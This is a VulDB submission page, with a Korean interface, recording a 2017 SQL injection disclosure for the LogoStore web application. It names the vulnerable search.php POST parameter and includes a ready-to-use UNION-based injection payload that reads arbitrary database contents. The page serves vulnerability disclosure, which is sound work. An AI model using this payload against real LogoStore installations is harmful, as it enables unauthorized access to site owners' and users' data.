| 제목 | LogoStore - SQL Injection |
|---|
| 설명 | Introduction
Exploit Title: LogoStore - SQL Injection
Date: 27.01.2017
Software Link: https://codecanyon.net/item/logostore-buy-and-sell-logos-online/19379630
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
LogoStore is a web application that allows you to buy and sell logos online. Manage logos within your account, check others logos and sell your own!
Type of vulnerability:
An SQL Injection vulnerability in LogoStore allows attackers to read
arbitrary data from the database.
Vulnerable URL : http://locahost/LogoStore/search.php
Mehod : POST
Parameter : query
Simple Payload:
Type: UNION query
Payload: query=test' UNION ALL SELECT CONCAT(CONCAT('qqkkq','VnPVWVaYxljWqGpLLbEIyPIHBjjjjASQTnaqfKaV'),'qvvpq'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- oCrh&search= |
|---|
| 사용자 | KAAN KAMIS (UID 213) |
|---|
| 제출 | 2017. 02. 01. PM 12:27 (9 연령 ago) |
|---|
| 모더레이션 | 2017. 02. 03. PM 11:15 (2 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 96540 [LogoStore /LogoStore/search.php 질문 SQL 주입] |
|---|
| 포인트들 | 17 |
|---|